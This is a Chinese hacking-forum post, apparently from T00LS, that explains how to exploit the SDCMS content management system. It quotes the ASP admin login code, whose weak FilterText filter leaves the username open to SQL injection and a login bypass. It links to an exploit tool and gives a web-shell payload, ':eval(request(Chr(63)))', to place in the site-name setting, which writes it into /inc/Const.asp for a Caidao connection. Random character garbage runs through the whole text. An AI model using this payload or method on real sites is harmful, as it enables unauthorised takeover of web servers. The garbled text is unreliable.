作者:T00LS 鬼哥
% ?$ q) t3 J( t0 R* x% C漏洞文件:后台目录/index.asp$ E$ s# o4 O [3 s" g2 \4 X
' z$ ^: t$ f7 a9 h R# Q1 ~) L8 vSub Check+ Y1 P; W$ r \) p2 _1 b# A
Dim username,password,code,getcode,Rs- A4 l3 J. j% J" X% v* B
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
V! e1 P3 n- Q( t! T" e username=FilterText(Trim(Request.Form("username")),1). Z# d- D, _. s$ x( ?
password=FilterText(Trim(Request.Form("password")),1)
' \/ j0 e# m2 A4 k code=Trim(Request.Form("yzm"))
3 H# Z0 i, j- f4 ]/ g getcode=Session("SDCMSCode")) b) A7 @' u/ _! T. O- @% k" q
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died' Q+ G( a+ }5 }9 ?
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
) p3 [7 n6 L5 ^. L' y: t/ Q IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied/ L/ P7 e5 N* i5 J/ o7 M
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied' x; j: P: g( f0 O% Y/ d
IF username="" or password="" Then1 G' v/ G/ \8 `2 o! D, z
Echo "用户名或密码不能为空" ied
" `% F" N3 ~. r. s7 A4 [2 v Else
2 b, X5 h, W6 ~1 o. _) Q4 w Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
# I. Q% s1 M3 T% N; F1 h/ \ IF Rs.Eof Then
' L: g) Q2 c9 ^4 B AddLog username,GetIp,"登录失败",1
4 Q3 R4 H- h2 F: {) u! g! } Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
* ]2 Q5 P6 d- O0 d3 O$ j Else! t6 B3 ?0 N0 w' `3 v# d. O
Add_Cookies "sdcms_id",Rs(0)
( K# j- ]1 l# |" {0 R; }: ~, |3 I7 ~ Add_Cookies "sdcms_name",username6 x# s% [6 }! w- P! ]3 i
Add_Cookies "sdcms_pwd",Rs(2)
. v% j i: Q7 v Add_Cookies "sdcms_admin",Rs(3)) P) C% [0 m9 m0 E. W" S+ U
Add_Cookies "sdcms_alllever",Rs(4)
( s9 J# o' V* W/ F# u+ ? Add_Cookies "sdcms_infolever",Rs(5)
0 D' j9 _. P' J: b' g t% k Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
% |5 I3 C$ Y* Q AddLog username,GetIp,"登录成功",1
- \+ L4 u. d! A4 f '自动删除30天前的Log记录2 y# T; K' N, x( m. S5 Y8 k0 B( F
IF Sdcms_DataType Then+ l2 q- R% |' F
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
' }5 ]( B% J) ~& `. t Else$ Q. y/ ~& z. J3 r
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
y" ~6 M+ N5 t; f B% H L! U: a( h' f End IF
' \- X8 x4 y, D' @' p' t b Go("sdcms_index.asp")' t7 ?: J" ]6 ]
End IF# o5 k6 q l! f3 _! @2 j
Rs.Close4 R" r' S( o/ f7 d, ~: R8 W
Set Rs=Nothing
+ n( J! V. C1 P End IF! G. a* J$ J% ^* j2 Q& v0 j
End Sub+ c( I/ x% w: S4 ~8 D% O
/ Y W+ ]" V" S# j: Q* n7 F2 O; O
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码& d! R0 r& M3 ]. N6 ?
6 ^4 o; |( V& z0 gFunction FilterText(ByVal t0,ByVal t1)
& M5 T, H. n* [' |8 S IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function& W' J1 x( X0 A9 j; y0 ~2 g
t0=Trim(t0)! ]" X. j1 X3 l6 R$ T. v; }: Z
Select Case t1
8 t8 E0 R. y! r Case "1"5 Q( e M4 D( P6 r: }8 O1 A: t
t0=Replace(t0,Chr(32),""), I! S% T. p% J5 q
t0=Replace(t0,Chr(13),"")
# [# {6 ^! n$ t- s t0=Replace(t0,Chr(10)&Chr(10),"")
% i! Y$ R, N3 h. q1 i t0=Replace(t0,Chr(10),"")
$ S- T) I7 a6 X. E5 f1 K Case "2"
, H# S6 K1 t: M6 ?% X, c t0=Replace(t0,Chr(8),"")'回格9 A; d, R. i7 G6 g+ N9 Q* o
t0=Replace(t0,Chr(9),"")'tab(水平制表符)- H" a. x7 v) c$ b$ k7 l
t0=Replace(t0,Chr(10),"")'换行) z9 t7 T: l- N0 k; M
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)5 n; @) x t$ B; ~% Y6 B' q
t0=Replace(t0,Chr(12),"")'换页
) V! B0 k$ e: Q t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
^! C+ i2 F/ N$ B+ F+ t, J! q8 ~, m t0=Replace(t0,Chr(22),"")
P* Z' N& t1 ]- i% F t0=Replace(t0,Chr(32),"")'空格 SPACE
, Q# i. ?- V6 h) k t0=Replace(t0,Chr(33),"")'!7 R9 @0 D9 C, m+ r( e" `
t0=Replace(t0,Chr(34),"")'"
% k! ~1 T) G/ V2 m8 k2 g t0=Replace(t0,Chr(35),"")'#$ `; `" B: e p; z) S7 _
t0=Replace(t0,Chr(36),"")'$6 w3 t- ~8 r6 {
t0=Replace(t0,Chr(37),"")'%
5 Z% w9 H2 r' J9 `4 ~% e; T9 s' w t0=Replace(t0,Chr(38),"")'&
- D- k1 C: l. X5 ^ t0=Replace(t0,Chr(39),"")''
. J& d* x3 O9 D5 w t0=Replace(t0,Chr(40),"")'(
( [& m8 P0 o) E! N2 Q; o% ] t0=Replace(t0,Chr(41),"")')3 S/ P( ~! D1 z5 T7 o6 g
t0=Replace(t0,Chr(42),"")'*
0 e& M7 m) ~1 n3 x3 n, O1 X t0=Replace(t0,Chr(43),"")'+" z2 v6 Q5 r$ c; z5 L5 ^
t0=Replace(t0,Chr(44),"")',
9 ]' _8 A; K! _0 E9 o% p$ S t0=Replace(t0,Chr(45),"")'-
( h! V* l6 x8 h0 t# Z( ] t0=Replace(t0,Chr(46),"")'. h$ e$ }4 c, L: R/ B3 b Q L
t0=Replace(t0,Chr(47),"")'/
5 t! [ D' j4 N3 J* _ m+ } t0=Replace(t0,Chr(58),"")':. d/ K1 m) Q2 }. a" s+ u
t0=Replace(t0,Chr(59),"")';
- x3 x0 n& ?3 x4 @/ b t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>7 T2 C M# J n* G! ~
t0=Replace(t0,Chr(63),"")'?
1 E4 ^4 o& l% ], F" p& s8 [8 ~5 G t0=Replace(t0,Chr(64),"")'@
! S. F! o6 J, L c7 Q t0=Replace(t0,Chr(91),"")'\" k/ \6 _3 s" V
t0=Replace(t0,Chr(92),"")'\
5 q; O! W3 Z" Z t0=Replace(t0,Chr(93),"")']
/ }% q" s8 [3 u t0=Replace(t0,Chr(94),"")'^
' c3 p' ]4 ^; Y! ?! C" S t0=Replace(t0,Chr(95),"")'_2 i, A" z: ^6 D9 t# ~
t0=Replace(t0,Chr(96),"")'`
! P& b9 s. J, k y; \/ `# B9 G# r N t0=Replace(t0,Chr(123),"")'{
. _) ]3 H- P' w, O* C3 j1 U3 l t0=Replace(t0,Chr(124),"")'|
5 b: H. H ~8 s$ y/ p* U t0=Replace(t0,Chr(125),"")'}5 t) M3 S7 d% k* X: _
t0=Replace(t0,Chr(126),"")'~9 {. c8 X1 E% C7 x9 }# H
Case Else: Z- o% k2 ]9 a+ q- W' |) H
t0=Replace(t0, "&", "&")
1 X7 }) I, O( J: M t0=Replace(t0, "'", "'")
! W' M; I$ _0 x4 N# t( f) i" d t0=Replace(t0, """", """): h5 N/ {" }0 q) K. P
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
' [ B7 [$ X |+ {; a End Select* X: n; O$ d3 S* p
IF Instr(Lcase(t0),"expression")>0 Then* j+ j/ H* u: j& n2 U
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
2 m7 F# F. ?; n. S End If( J7 y3 I3 T0 W& n- M2 A) C: M
FilterText=t0* V, }! J6 A5 U
End Function1 @# f! Z- i: R2 M$ t3 \
; g! y! M, _- v8 j+ q1 K7 O# E
看到没。直接参数是1 只过滤- ^! N/ \; r$ J) q& d. |
t0=Replace(t0,Chr(32)," ")3 s2 O; r! n! B' Z7 @& w
t0=Replace(t0,Chr(13),"")
, p6 b, o# V; {! h& A0 I/ w t0=Replace(t0,Chr(10)&Chr(10),"
# G& B: S" o& B& f* j' V")2 T$ s4 B% s( i) ~
t0=Replace(t0,Chr(10),"
( ~ G1 ~' o ?; R* f. j4 ^")) C# o1 G* r6 C# F8 A
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
! S8 D! L5 _0 l3 V# I5 {. Y# `EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP! ? Y7 V# R5 g* a
* C% Q- B K/ Q: j7 G$ U测试:
' l& I" l8 q/ p6 L9 F
' u% o4 |9 s7 U; r5 A
" f% Y) I5 ?" b; a# T; o6 E& }现在输入工具上验证码,然后点OK
: y% p9 w j# C6 P4 v- X( |& a% H9 c( W- ~
4 G4 w, D0 y. I( k看到我们直接进入后台管理界面了,呵呵!
* f9 f$ @- G# r$ O$ p' Y$ R* |0 F! B8 n
$ _/ `' y9 ~4 ]9 T7 y
. L! k" C; N. H3 o- Y这样直接进入后台了。。。。. W6 i9 I- B7 a, B9 n$ Y/ V
) s! Y# {( O. m" g, r( c, o8 r: N1 k
k% i0 @7 I: o8 N0 z% J, G
( i$ t# z4 t R% vSDCMS提权:
4 v( N! `7 }% t' C$ W" a- l. ]0 Z& L. S
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?. V3 O. K+ n u
6 w8 u% t9 x( z! O7 S
?1 C9 J2 V: j1 Y1 T! Y
. t0 I% e0 \; EOK,现在用菜刀连接下!/ k: p4 p, f& @
$ b3 ~7 K$ R5 E; D3 i9 [4 a! k0 Q( F
Z$ b7 P+ b9 Y; {
) F! j& U3 g" _1 ?/ I
' I; u2 |( A8 ]! r
/ u5 z# p* g7 W8 X5 _ |